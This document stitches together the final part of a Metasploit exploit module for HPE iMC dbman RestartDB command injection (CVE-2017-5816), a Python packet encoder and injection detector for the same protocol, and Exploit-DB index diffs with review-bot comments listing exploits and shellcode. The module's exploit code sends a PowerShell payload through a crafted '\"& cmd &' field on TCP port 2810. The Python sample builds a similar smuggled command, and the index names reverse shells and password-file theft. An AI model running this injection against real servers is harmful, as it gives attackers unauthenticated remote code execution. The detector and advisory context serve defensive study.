'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['CVE', '2017-5816'],
['EDB', '43198'],
['ZDI', '17-340'],
['URL', 'https://www.securityfocus.com/bid/98469/info'],
['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
],
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Payload' => { 'BadChars' => "\x00" },
'DefaultOptions' => { 'WfsDelay' => 15 },
'Privileged' => true,
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
register_options [Opt::RPORT(2810)]
end
def check
# empty RestartDB packet
pkt = [10008].pack('N')
connect
sock.put pkt
res = sock.get_once
disconnect
# Expected reply:
# "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
return CheckCode::Detected if res =~ /dbman/i
CheckCode::Safe
end
def dbman_msg(db_instance)
data = ''
db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
db_type = "\x04" # SQL Server
db_sa_username = rand_text_alpha rand(1..5)
db_sa_password = rand_text_alpha rand(1..5)
ora_db_ins = rand_text_alpha rand(1..5)
# dbIp
data << "\x04"
data << [db_ip.length].pack('C')
data << db_ip
# iDBType
data << "\x02"
data << [db_type.length].pack('C')
data << db_type
# dbInstance
data << "\x04"
data << "\x82"
data << [db_instance.length].pack('n')
data << db_instance
# dbSaUserName
data << "\x04"
data << [db_sa_username.length].pack('C')
data << db_sa_username
# dbSaPassword
data << "\x04"
data << [db_sa_password.length].pack('C')
data << db_sa_password
# strOraDbIns
data << "\x04"
data << [ora_db_ins.length].pack('C')
data << ora_db_ins
data
end
def dbman_restartdb_pkt(db_instance)
data = dbman_msg db_instance
# opcode 10008 (RestartDB)
pkt = [10008].pack('N')
# packet length
pkt << "\x00\x00"
pkt << [data.length + 4].pack('n')
# packet data length
pkt << "\x30\x82"
pkt << [data.length].pack('n')
# packet data
pkt << data
pkt
end
def execute_command(cmd, _opts = {})
connect
sock.put dbman_restartdb_pkt "\"& #{cmd} &"
disconnect
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
if command.length > 8000
fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
end
print_status "Sending payload (#{command.length} bytes)..."
execute_command command
end
end
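The two modules above hand-build the same framing for OpCode 10007 (RestoreDBase) and 10008 (RestartDB). As an added example (Python, not part of either module), here is an encoder and a decoder for that framing, plus a check that flags the unsanitised string fields the modules abuse. Field names come from the module comments; positions the modules mark `???` stay unnamed; the default field values and the shell-metacharacter set are assumptions. The decoder can be pointed at a capture of TCP/2810 traffic to spot injection attempts.

```python
import re
import struct

OP_RESTOREDBASE = 10007   # dbman RestoreDBase
OP_RESTARTDB = 10008      # dbman RestartDB

# Field positions recovered from the two modules above; unknown ones stay unnamed.
FIELD_NAMES = {
    OP_RESTARTDB: {0: 'dbIp', 1: 'iDBType', 2: 'dbInstance', 3: 'dbSaUserName',
                   4: 'dbSaPassword', 5: 'strOraDbIns'},
    OP_RESTOREDBASE: {0: 'dbIp', 5: 'dbType', 6: 'restoreType', 8: 'dbUser',
                      9: 'dbPassword', 10: 'dbPort', 11: 'dbInstance'},
}
# Assumed: characters that break out of the quoted argument on the command line.
SHELL_META = re.compile(rb'["&|;`$<>]')


def tlv(tag, value, long_form=False):
    """Encode one DER-style TLV the way dbman_msg does: a single length byte
    below 0x80, or 0x82 + big-endian uint16 (the modules always use the long
    form for the injected field)."""
    if len(value) < 0x80 and not long_form:
        return bytes([tag, len(value)]) + value
    if len(value) > 0xFFFF:
        raise ValueError('value longer than a two-byte length can describe')
    return bytes([tag, 0x82]) + struct.pack('>H', len(value)) + value


def parse_tlvs(buf):
    """Split concatenated TLVs into (tag, value) pairs; raises on truncation."""
    items, i = [], 0
    while i < len(buf):
        if i + 2 > len(buf):
            raise ValueError('truncated TLV header at %d' % i)
        tag, first = buf[i], buf[i + 1]
        i += 2
        if first < 0x80:
            length = first
        else:
            n = first & 0x7F
            if n not in (1, 2) or i + n > len(buf):
                raise ValueError('unsupported length encoding at %d' % i)
            length = int.from_bytes(buf[i:i + n], 'big')
            i += n
        if i + length > len(buf):
            raise ValueError('truncated TLV value at %d' % i)
        items.append((tag, buf[i:i + length]))
        i += length
    return items


def build_pkt(opcode, fields):
    """Frame encoded fields exactly as dbman_restartdb_pkt/dbman_restoredbase_pkt
    do: uint32 opcode, uint32 total length, then a SEQUENCE (0x30 0x82 len16)."""
    body = b''.join(fields)
    seq = b'\x30\x82' + struct.pack('>H', len(body)) + body
    return struct.pack('>II', opcode, len(seq)) + seq


def build_restartdb(db_instance, db_ip=b'10.0.0.1', db_type=4,
                    sa_user=b'sa', sa_pass=b'pw', ora_ins=b'x'):
    """RestartDB message in the field order of the second module (defaults assumed)."""
    return build_pkt(OP_RESTARTDB, [
        tlv(0x04, db_ip),
        tlv(0x02, bytes([db_type])),          # 4 = SQL Server
        tlv(0x04, db_instance, long_form=True),
        tlv(0x04, sa_user),
        tlv(0x04, sa_pass),
        tlv(0x04, ora_ins),
    ])


def parse_pkt(pkt):
    """Return (opcode, [(tag, value), ...]) or raise if the framing is inconsistent."""
    if len(pkt) < 8:
        raise ValueError('packet shorter than its 8-byte header')
    opcode, length = struct.unpack('>II', pkt[:8])
    if length != len(pkt) - 8:
        raise ValueError('length field %d does not match body %d' % (length, len(pkt) - 8))
    outer = parse_tlvs(pkt[8:])
    if len(outer) != 1 or outer[0][0] != 0x30:
        raise ValueError('expected a single SEQUENCE')
    return opcode, parse_tlvs(outer[0][1])


def find_injection(pkt):
    """Names and values of OCTET STRING fields carrying shell metacharacters:
    the check dbman itself does not perform before building its command line."""
    opcode, fields = parse_pkt(pkt)
    names = FIELD_NAMES.get(opcode, {})
    hits = []
    for idx, (tag, value) in enumerate(fields):
        if tag == 0x04 and SHELL_META.search(value):
            hits.append((names.get(idx, 'field%d' % idx), value))
    return hits


if __name__ == '__main__':
    crafted = build_restartdb(b'"& calc.exe &')       # constructed sample
    print(find_injection(crafted))
```

Any packet the modules' `execute_command` emits is caught by `find_injection` because the injected string always carries `"&`; a benign restart request with a plain instance name yields an empty list.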


@ -5449,6 +5449,8 @@ id,file,description,date,author,type,platform,port
43454,exploits/windows/dos/43454.py,"DiskBoss Enterprise 8.5.12 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows, 43454,exploits/windows/dos/43454.py,"DiskBoss Enterprise 8.5.12 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,
43456,exploits/windows/dos/43456.txt,"BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)",2018-01-08,hyp3rlinx,dos,windows, 43456,exploits/windows/dos/43456.txt,"BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)",2018-01-08,hyp3rlinx,dos,windows,
43471,exploits/windows/dos/43471.cpp,"Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure",2018-01-09,"Google Security Research",dos,windows, 43471,exploits/windows/dos/43471.cpp,"Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
43490,exploits/hardware/dos/43490.txt,"Multiple CPUs - Information Leak Using Speculative Execution",2018-01-10,"Google Security Research",dos,hardware,
43491,exploits/windows/dos/43491.js,"Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check",2018-01-10,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows, 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
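Review bot: the new 43490 row files the speculative-execution PoC under platform `hardware`, while the existing 43427 'Spectre' row in the next hunk uses platform `multiple` for the same class of issue; pick one so the two entries sort and search together.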
@ -9259,6 +9261,7 @@ id,file,description,date,author,type,platform,port
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple, 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux, 43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows, 43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
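Review bot: the 43494 row is the only metadata for exploits/windows/local/43494.cpp; the source file itself carries no Exploit Title/Author/Version header like the other files added in this commit, so the title, author and the `12.5.1` version exist only in this CSV line. Add the header comment to the .cpp so the file stands on its own.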
@ -15909,6 +15912,9 @@ id,file,description,date,author,type,platform,port
43450,exploits/hardware/remote/43450.py,"Cisco IOS - Remote Code Execution",2018-01-05,"Artem Kondratenko",remote,hardware, 43450,exploits/hardware/remote/43450.py,"Cisco IOS - Remote Code Execution",2018-01-05,"Artem Kondratenko",remote,hardware,
43458,exploits/multiple/remote/43458.py,"Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution",2018-01-03,"Kevin Kirsche",remote,multiple, 43458,exploits/multiple/remote/43458.py,"Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution",2018-01-03,"Kevin Kirsche",remote,multiple,
43472,exploits/windows/remote/43472.rb,"Commvault Communications Service (cvd) - Command Injection (Metasploit)",2018-01-09,Metasploit,remote,windows,8400 43472,exploits/windows/remote/43472.rb,"Commvault Communications Service (cvd) - Command Injection (Metasploit)",2018-01-09,Metasploit,remote,windows,8400
43478,exploits/windows/remote/43478.py,"DiskBoss Enterprise 8.8.16 - Buffer Overflow",2018-01-10,"Arris Huijgen",remote,windows,
43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows, 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
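Review bot: the 43478 DiskBoss row leaves the port column empty although the exploit hard-codes a port per edition (8094 for Server/Enterprise, 8096/8097/8098 for Free/Pro/Ultimate), whereas the adjacent 43492/43493 rows fill in 2810. Either fill in 8094 for the Enterprise edition the title names or record that the port varies by edition.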
@ -25785,6 +25791,7 @@ id,file,description,date,author,type,platform,port
19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,webapps,php, 19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,webapps,php,
19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,webapps,php, 19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,webapps,php,
19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php, 19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,
43474,exploits/php/webapps/43474.rb,"Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)",2018-01-10,"James Bercegay",webapps,php,
43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,webapps,hardware, 43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,webapps,hardware,
19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",webapps,hardware, 19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",webapps,hardware,
19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,webapps,php, 19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,webapps,php,
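Review bot: the 43474 row ("Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)") does not follow the convention the other three Metasploit modules added in this commit use: 43472, 43492 and 43493 carry author Metasploit and a port value, while 43474 is credited to "James Bercegay" and has an empty port. Either attribution may be the intended one, but the four .rb rows should agree, so decide whether a Metasploit module's author field names the module author or Metasploit, and set the port the module targets.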
@ -37734,6 +37741,14 @@ id,file,description,date,author,type,platform,port
43460,exploits/hardware/webapps/43460.py,"FiberHome LM53Q1 - Multiple Vulnerabilities",2018-01-08,"Ibad Shah",webapps,hardware, 43460,exploits/hardware/webapps/43460.py,"FiberHome LM53Q1 - Multiple Vulnerabilities",2018-01-08,"Ibad Shah",webapps,hardware,
43461,exploits/php/webapps/43461.txt,"WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload",2018-01-08,NinTechNet,webapps,php, 43461,exploits/php/webapps/43461.txt,"WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload",2018-01-08,NinTechNet,webapps,php,
43462,exploits/php/webapps/43462.html,"Vanilla < 2.1.5 - Cross-Site Request Forgery",2018-01-08,"Anand Meyyappan",webapps,php, 43462,exploits/php/webapps/43462.html,"Vanilla < 2.1.5 - Cross-Site Request Forgery",2018-01-08,"Anand Meyyappan",webapps,php,
43475,exploits/php/webapps/43475.txt,"Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure",2018-01-10,telahdihapus,webapps,php,
43477,exploits/php/webapps/43477.txt,"Muviko 1.1 - SQL Injection",2018-01-10,"Ahmad Mahfouz",webapps,php,
43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,
43484,exploits/php/webapps/43484.txt,"WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43485,exploits/php/webapps/43485.txt,"WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43487,exploits/php/webapps/43487.txt,"WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43488,exploits/php/webapps/43488.txt,"Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting",2018-01-10,"Mattia Furlani",webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php, 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware, 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware, 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
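Review bot: the 43475 description reads "Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure"; "Worpress" is a typo for "WordPress" and defeats any search on the vendor name, so fix it in this row (the older 41622 row in the same hunk carries the lowercase "Wordpress" variant, which this commit could normalise at the same time). Separately, the four Panagiotis Vagenas rows (43484 to 43487) set port 80 while the other new webapps rows in the hunk (43475, 43477, 43479, 43488) leave the port blank; pick one convention for HTTP webapps entries and apply it to all eight.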

@ -4,7 +4,7 @@ id,file,description,date,author,type,platform
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd 13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86 13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
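Review bot: the 13245 rename swaps the description to "setuid(0) + Bind TCP Shell (31337/TCP)", which matches the order used by 13244 ("setuid(0) + execve /bin/sh") and presumably the order of the calls in the payload. If call order is the convention, 13247 in this same hunk still reads "execve /bin/sh + setuid(0)", an order that cannot describe what the code does, because nothing runs after a successful execve; check that file and rename it the same way, or state in the commit message which ordering the descriptions are meant to follow.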
@ -13,8 +13,8 @@ id,file,description,date,author,type,platform
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd_x86 13256,shellcodes/freebsd_x86/13256.c,"FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,freebsd_x86
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
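Review bot: two rows in this hunk need a cross-check against the files they describe. The 13255 rename replaces the placeholder "[email]" with a concrete recipient, "root@localhost"; that is only right if shellcodes/bsd_x86/13255.c hardcodes that address, otherwise the placeholder was saying that the recipient is configurable and should stay. The 13256 row changes the path from shellcodes/bsd_x86/13256.c to shellcodes/freebsd_x86/13256.c and the platform to freebsd_x86; editing the CSV does not move the file, so the commit must include the corresponding rename, or anything that resolves the path from this CSV will point at a file that does not exist.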
@ -416,7 +416,7 @@ id,file,description,date,author,type,platform
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86 15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,bsd_x86 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86 16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86
17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4 17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4
17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86 17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86
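Review bot: the 16026 row changes the path from shellcodes/bsd_x86/16026.c to shellcodes/freebsd_x86/16026.c and the platform to freebsd_x86; the CSV edit alone does not move the file, so confirm the rename is part of this commit. The reclassification itself is consistent with the visible data, since the companion generator 16025 by the same author on the same date is already labelled FreeBSD/x86.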
@ -622,6 +622,12 @@ id,file,description,date,author,type,platform
41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64 41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86 41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86
43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86 43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86
43476,shellcodes/lin_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,lin_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
